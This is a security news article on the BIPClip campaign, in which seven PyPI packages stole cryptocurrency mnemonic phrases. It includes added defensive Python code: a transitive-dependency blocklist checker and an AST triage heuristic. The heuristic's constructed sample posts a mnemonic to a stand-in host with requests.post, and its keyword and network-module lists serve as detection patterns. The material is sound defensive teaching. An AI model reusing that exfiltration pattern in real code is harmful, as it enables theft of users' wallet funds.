
Beware: these PyPI packages can drain your cryptocurrency wallets.

Threat hunters have discovered seven malicious packages on the Python Package Index (PyPI) repository, built to steal BIP39 mnemonic phrases, the word lists used to recover the private keys of cryptocurrency wallets. The campaign, codenamed BIPClip by ReversingLabs, has been active since at least December 4, 2022, and is the latest in a series of software supply chain attacks targeting cryptocurrency assets.

The seven packages were downloaded 7,451 times in total before being removed from PyPI: jsBIP39-decrypt (126 downloads), bip39-mnemonic-decrypt (689 downloads), mnemonic_to_address (771 downloads), erc20-scanner (343 downloads), public-address-generator (1,005 downloads), hashdecrypt (4,292 downloads), and hashdecrypts (225 downloads).

According to security researcher Karlo Zanki, whose report was shared with The Hacker News, the campaign confirms that cryptocurrency remains one of the most popular targets for supply chain threat actors. Zanki also noted that the operators took care to avoid detection: one of the packages, mnemonic_to_address, contained no malicious functionality of its own and merely listed bip39-mnemonic-decrypt as a dependency, which in turn carried the malicious component. A reviewer who only inspects the package being installed, and not what it pulls in, would see nothing wrong with it.
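The dependency trick above is the reason a package audit has to walk the full dependency graph rather than stop at the package a user asked for. The following is an added example (not code from PyPI, ReversingLabs, or the article) that does exactly that against a constructed metadata index: the entry for mnemonic_to_address mirrors the article's description, the package name my-wallet-tool and its dependency list are hypothetical, and the blocklist is the seven names reported in the article.

```python
"""Walk a package's transitive dependencies and flag anything on a blocklist.

Added example. SAMPLE_INDEX is constructed: mnemonic_to_address -> bip39-mnemonic-decrypt
reflects the article; my-wallet-tool is a hypothetical package used only to show a
deeper chain. Nothing here is PyPI's or ReversingLabs' own code.
"""
import re
from typing import Dict, Iterable, List

# Package names reported in the BIPClip campaign (names as listed in the article).
BIPCLIP_PACKAGES = {
    "jsBIP39-decrypt", "bip39-mnemonic-decrypt", "mnemonic_to_address",
    "erc20-scanner", "public-address-generator", "hashdecrypt", "hashdecrypts",
}

# Constructed metadata: package name -> names it declares in Requires-Dist.
SAMPLE_INDEX: Dict[str, List[str]] = {
    "my-wallet-tool": ["requests", "mnemonic_to_address"],   # hypothetical top-level package
    "mnemonic_to_address": ["bip39-mnemonic-decrypt"],       # benign-looking wrapper, per the article
    "bip39-mnemonic-decrypt": ["requests"],                  # carries the malicious component
    "requests": ["urllib3", "charset_normalizer"],
    "urllib3": [],
    "charset_normalizer": [],
}


def normalize(name: str) -> str:
    """PEP 503 name normalisation: runs of '-', '_' and '.' become '-', case is folded.

    Without this, 'mnemonic_to_address' and 'mnemonic-to-address' would not match,
    which is exactly the kind of gap a blocklist check must not have.
    """
    return re.sub(r"[-_.]+", "-", name).lower()


def flag_blocklisted(
    root: str,
    index: Dict[str, List[str]],
    blocklist: Iterable[str] = BIPCLIP_PACKAGES,
    transitive: bool = True,
) -> Dict[str, List[str]]:
    """Return {blocklisted package: dependency chain from root} for every hit.

    With transitive=False only the root and its direct dependencies are examined,
    which is the check that misses a payload hidden one level down.
    Packages missing from the index are treated as leaves.
    """
    norm_index = {normalize(k): [normalize(d) for d in v] for k, v in index.items()}
    blocked = {normalize(b) for b in blocklist}
    start = normalize(root)

    hits: Dict[str, List[str]] = {}
    seen = set()
    stack = [(start, [start])]
    while stack:
        pkg, chain = stack.pop()
        if pkg in seen:
            continue
        seen.add(pkg)
        if pkg in blocked:
            hits[pkg] = chain
        # Only descend past the root when a transitive walk was requested.
        if transitive or pkg == start:
            for dep in norm_index.get(pkg, []):
                stack.append((dep, chain + [dep]))
    return hits


if __name__ == "__main__":
    # A blocklist that knows only the package carrying the payload:
    payload_only = {"bip39-mnemonic-decrypt"}
    print("direct deps only:", flag_blocklisted("my-wallet-tool", SAMPLE_INDEX, payload_only, transitive=False))
    print("transitive walk: ", flag_blocklisted("my-wallet-tool", SAMPLE_INDEX, payload_only))
    print("full blocklist:  ", flag_blocklisted("my-wallet-tool", SAMPLE_INDEX))
```

To audit a real environment, build the index from `importlib.metadata.requires(name)` (it returns the package's Requires-Dist strings; strip version specifiers and environment markers before normalising) or from a resolved lockfile, and run the walk from each top-level requirement.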

The malicious component was designed to collect mnemonic phrases and send them to a server controlled by the attackers. Two other packages, public-address-generator and erc20-scanner, operated in the same way, acting as lures that transmitted the stolen phrases to the same command-and-control (C2) server.

The package hashdecrypts worked differently. Unlike the others, it was not built to operate as one half of a pair and contained the data-harvesting code within itself. ReversingLabs also found references in this package to a GitHub profile named "HashSnake", which hosted a repository called hCrypto advertising how to extract mnemonic phrases from crypto wallets using the hashdecrypts package.
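The behaviour described in the two paragraphs above, a package that accepts a mnemonic phrase and ships it to a remote server, is cheap to triage statically: a module that both handles wallet-recovery material and makes outbound network calls deserves a closer look. The following is an added example (not the hashdecrypts code and not ReversingLabs' tooling) of such a heuristic built on Python's `ast` module. The three sample modules are constructed for the example; the exfiltration sample only imitates the pattern the article describes and posts to a reserved `.invalid` hostname.

```python
"""Static triage heuristic: flag modules that touch wallet-recovery material AND talk to the network.

Added example. The SAMPLE_* sources are constructed to exercise the heuristic; they are
not code from any of the packages named in the article.
"""
import ast
from typing import Dict, List, Optional, Set

# Top-level modules whose calls we treat as outbound network activity.
NETWORK_ROOTS: Set[str] = {"requests", "urllib", "http", "socket", "httpx", "aiohttp"}
# Substrings that indicate wallet-recovery material is being handled (case-insensitive).
WALLET_TERMS = ("mnemonic", "bip39", "seed_phrase", "private_key", "privkey", "wallet", "keystore")

# Constructed: a helper that looks like a decoder but posts the phrase out first.
SAMPLE_EXFIL = '''
import requests
from mnemonic import Mnemonic

def decrypt(words, api="http://example.invalid/collect"):
    seed = Mnemonic("english").to_seed(words)
    requests.post(api, data={"mnemonic": words})
    return seed
'''

# Constructed: wallet handling with no network activity.
SAMPLE_BENIGN = '''
from mnemonic import Mnemonic

def to_seed(words):
    return Mnemonic("english").to_seed(words)
'''

# Constructed: network activity with no wallet material.
SAMPLE_NET_ONLY = '''
from urllib.request import urlopen

def fetch(url):
    with urlopen(url) as r:
        return r.read()
'''


def _dotted(node: ast.AST) -> Optional[str]:
    """Render requests.post / urllib.request.urlopen as a dotted string; None for anything else."""
    parts: List[str] = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


class _Triage(ast.NodeVisitor):
    def __init__(self) -> None:
        self.network_aliases: Set[str] = set()   # names bound by e.g. `from urllib.request import urlopen`
        self.network_calls: List[str] = []
        self.wallet_terms: Set[str] = set()

    def _note_text(self, text: str) -> None:
        low = text.lower()
        for term in WALLET_TERMS:
            if term in low:
                self.wallet_terms.add(term)

    def visit_ImportFrom(self, node: ast.ImportFrom) -> None:
        if node.module:
            self._note_text(node.module)
            if node.module.split(".")[0] in NETWORK_ROOTS:
                self.network_aliases.update(a.asname or a.name for a in node.names)
        self.generic_visit(node)

    def visit_Call(self, node: ast.Call) -> None:
        name = _dotted(node.func)
        if name and (name.split(".")[0] in NETWORK_ROOTS or name in self.network_aliases):
            self.network_calls.append(name)
        self.generic_visit(node)

    def generic_visit(self, node: ast.AST) -> None:
        # Every text-bearing node is checked for wallet terms: identifiers, attribute
        # names, parameter names, imported names and string constants (dict keys included).
        if isinstance(node, ast.Name):
            self._note_text(node.id)
        elif isinstance(node, ast.Attribute):
            self._note_text(node.attr)
        elif isinstance(node, ast.arg):
            self._note_text(node.arg)
        elif isinstance(node, ast.alias):
            self._note_text(node.name)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            self._note_text(node.value)
        super().generic_visit(node)


def triage_source(source: str) -> Dict[str, object]:
    """Parse one module and report network calls, wallet terms, and whether both co-occur."""
    visitor = _Triage()
    visitor.visit(ast.parse(source))
    return {
        "network_calls": visitor.network_calls,
        "wallet_terms": sorted(visitor.wallet_terms),
        "suspicious": bool(visitor.network_calls) and bool(visitor.wallet_terms),
    }


if __name__ == "__main__":
    for label, src in (("exfil", SAMPLE_EXFIL), ("benign", SAMPLE_BENIGN), ("net-only", SAMPLE_NET_ONLY)):
        print(label, triage_source(src))
```

The co-occurrence rule is deliberately simple: it will not catch obfuscated or dynamically imported network code, and a legitimate wallet client will trip it, so treat a hit as a reason to read the package, not as a verdict. Running it over every module in a freshly built sdist or wheel (including the packages a wrapper pulls in) is the point.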

The repository's commit history shows that the campaign has been running for more than a year: one of its scripts imported the package hashdecrypt (without the "s") until March 1, 2024, when hashdecrypts was uploaded to PyPI.

The HashSnake account also maintains a presence on Telegram and YouTube, where it advertises its wares. The researchers urge users to be cautious when installing packages from PyPI and to verify a package's provenance, including the dependencies it declares, before using it.


Deitasoft © 2024. All Rights Reserved.